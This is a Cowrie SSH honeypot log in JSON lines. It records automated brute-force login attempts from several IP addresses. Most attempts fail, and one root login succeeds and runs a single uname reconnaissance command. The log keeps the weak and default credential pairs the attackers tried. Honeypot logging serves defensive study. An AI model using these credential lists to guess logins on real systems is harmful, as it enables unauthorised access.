{"eventid":"cowrie.login.failed","username":"user","password":"123456qwerty","message":"login attempt [user/123456qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T02:58:05.684198Z","src_ip":"212.227.125.160","session":"7f41f1d8b887"}
{"eventid":"cowrie.login.failed","username":"user","password":"tobias","message":"login attempt [user/tobias] failed","sensor":"my-vps","timestamp":"2025-08-28T02:58:06.799220Z","src_ip":"212.227.125.160","session":"7f41f1d8b887"}
{"eventid":"cowrie.login.failed","username":"user","password":"tatyana","message":"login attempt [user/tatyana] failed","sensor":"my-vps","timestamp":"2025-08-28T02:58:07.914314Z","src_ip":"212.227.125.160","session":"7f41f1d8b887"}
{"eventid":"cowrie.login.failed","username":"user","password":"stuff","message":"login attempt [user/stuff] failed","sensor":"my-vps","timestamp":"2025-08-28T02:58:09.029899Z","src_ip":"212.227.125.160","session":"7f41f1d8b887"}
{"eventid":"cowrie.login.failed","username":"user","password":"spectrum","message":"login attempt [user/spectrum] failed","sensor":"my-vps","timestamp":"2025-08-28T02:58:10.145565Z","src_ip":"212.227.125.160","session":"7f41f1d8b887"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:58:11.259913Z","src_ip":"212.227.125.160","session":"7f41f1d8b887"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":27662,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c8e4ae6a034","protocol":"ssh","message":"New connection: 45.125.211.194:27662 (1.2.3.4:22) [session: 9c8e4ae6a034]","sensor":"my-vps","timestamp":"2025-08-28T02:58:16.676106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:58:16.685802Z","src_ip":"45.125.211.194","session":"9c8e4ae6a034"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:58:16.915258Z","src_ip":"45.125.211.194","session":"9c8e4ae6a034"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-08-28T02:58:17.786721Z","src_ip":"45.125.211.194","session":"9c8e4ae6a034"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:58:19.010192Z","src_ip":"45.125.211.194","session":"9c8e4ae6a034"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":52875,"dst_ip":"1.2.3.4","dst_port":22,"session":"dce4a21d0bb6","protocol":"ssh","message":"New connection: 45.125.211.194:52875 (1.2.3.4:22) [session: dce4a21d0bb6]","sensor":"my-vps","timestamp":"2025-08-28T02:58:31.380921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:58:31.387443Z","src_ip":"45.125.211.194","session":"dce4a21d0bb6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:58:31.597923Z","src_ip":"45.125.211.194","session":"dce4a21d0bb6"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:58:32.429035Z","src_ip":"45.125.211.194","session":"dce4a21d0bb6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:58:33.639674Z","src_ip":"45.125.211.194","session":"dce4a21d0bb6"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":60140,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bb138953077","protocol":"ssh","message":"New connection: 45.125.211.194:60140 (1.2.3.4:22) [session: 3bb138953077]","sensor":"my-vps","timestamp":"2025-08-28T02:58:46.078548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:58:46.091357Z","src_ip":"45.125.211.194","session":"3bb138953077"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:58:46.288869Z","src_ip":"45.125.211.194","session":"3bb138953077"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-28T02:58:47.124118Z","src_ip":"45.125.211.194","session":"3bb138953077"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:58:48.336150Z","src_ip":"45.125.211.194","session":"3bb138953077"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":62306,"dst_ip":"1.2.3.4","dst_port":22,"session":"65e305969c80","protocol":"ssh","message":"New connection: 45.125.211.194:62306 (1.2.3.4:22) [session: 65e305969c80]","sensor":"my-vps","timestamp":"2025-08-28T02:59:00.887468Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:59:00.906084Z","src_ip":"45.125.211.194","session":"65e305969c80"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:59:01.097932Z","src_ip":"45.125.211.194","session":"65e305969c80"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:59:01.937341Z","src_ip":"45.125.211.194","session":"65e305969c80"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:59:03.150254Z","src_ip":"45.125.211.194","session":"65e305969c80"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":60924,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4e666e96f5a","protocol":"ssh","message":"New connection: 194.233.79.134:60924 (1.2.3.4:22) [session: a4e666e96f5a]","sensor":"my-vps","timestamp":"2025-08-28T02:59:15.373853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:59:15.404380Z","src_ip":"194.233.79.134","session":"a4e666e96f5a"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":22699,"dst_ip":"1.2.3.4","dst_port":22,"session":"0856cd5f0d7e","protocol":"ssh","message":"New connection: 45.125.211.194:22699 (1.2.3.4:22) [session: 0856cd5f0d7e]","sensor":"my-vps","timestamp":"2025-08-28T02:59:15.655832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:59:15.670371Z","src_ip":"45.125.211.194","session":"0856cd5f0d7e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:59:15.796676Z","src_ip":"194.233.79.134","session":"a4e666e96f5a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:59:15.873377Z","src_ip":"45.125.211.194","session":"0856cd5f0d7e"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T02:59:16.697099Z","src_ip":"45.125.211.194","session":"0856cd5f0d7e"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:59:17.905860Z","src_ip":"45.125.211.194","session":"0856cd5f0d7e"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-28T02:59:18.076666Z","src_ip":"194.233.79.134","session":"a4e666e96f5a"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:59:19.315861Z","src_ip":"194.233.79.134","session":"a4e666e96f5a"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":39064,"dst_ip":"1.2.3.4","dst_port":22,"session":"662d1a85ac9a","protocol":"ssh","message":"New connection: 45.125.211.194:39064 (1.2.3.4:22) [session: 662d1a85ac9a]","sensor":"my-vps","timestamp":"2025-08-28T02:59:30.394029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:59:30.410418Z","src_ip":"45.125.211.194","session":"662d1a85ac9a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:59:30.604463Z","src_ip":"45.125.211.194","session":"662d1a85ac9a"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-28T02:59:31.442949Z","src_ip":"45.125.211.194","session":"662d1a85ac9a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:59:32.654993Z","src_ip":"45.125.211.194","session":"662d1a85ac9a"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":43510,"dst_ip":"1.2.3.4","dst_port":22,"session":"349061a2d001","protocol":"ssh","message":"New connection: 45.125.211.194:43510 (1.2.3.4:22) [session: 349061a2d001]","sensor":"my-vps","timestamp":"2025-08-28T02:59:45.241125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:59:45.282105Z","src_ip":"45.125.211.194","session":"349061a2d001"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:59:45.465103Z","src_ip":"45.125.211.194","session":"349061a2d001"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin123","message":"login attempt [gpadmin/gpadmin123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:59:46.341225Z","src_ip":"45.125.211.194","session":"349061a2d001"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:59:47.562805Z","src_ip":"45.125.211.194","session":"349061a2d001"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":22133,"dst_ip":"1.2.3.4","dst_port":22,"session":"264c48c9915d","protocol":"ssh","message":"New connection: 45.125.211.194:22133 (1.2.3.4:22) [session: 264c48c9915d]","sensor":"my-vps","timestamp":"2025-08-28T03:00:00.063714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:00:00.082848Z","src_ip":"45.125.211.194","session":"264c48c9915d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:00:00.279871Z","src_ip":"45.125.211.194","session":"264c48c9915d"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:00:01.103812Z","src_ip":"45.125.211.194","session":"264c48c9915d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:00:01.776324Z","src_ip":"45.125.211.194","session":"264c48c9915d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:00:01.783920Z","src_ip":"45.125.211.194","session":"264c48c9915d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:00:01.997103Z","src_ip":"45.125.211.194","session":"264c48c9915d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:00:02.000532Z","src_ip":"45.125.211.194","session":"264c48c9915d"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":32145,"dst_ip":"1.2.3.4","dst_port":22,"session":"d553fa9e35c6","protocol":"ssh","message":"New connection: 45.125.211.194:32145 (1.2.3.4:22) [session: d553fa9e35c6]","sensor":"my-vps","timestamp":"2025-08-28T03:00:15.104454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:00:15.110760Z","src_ip":"45.125.211.194","session":"d553fa9e35c6"}
